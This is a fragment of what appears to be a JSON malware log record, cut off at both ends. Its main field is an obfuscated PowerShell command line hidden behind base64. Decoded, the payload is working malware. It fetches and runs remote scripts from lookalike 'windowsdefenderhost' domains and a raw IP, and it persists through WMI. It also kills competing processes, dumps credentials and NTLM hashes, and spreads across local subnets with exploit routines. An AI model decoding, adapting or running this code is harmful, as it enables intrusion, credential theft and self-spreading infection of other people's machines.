C0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgB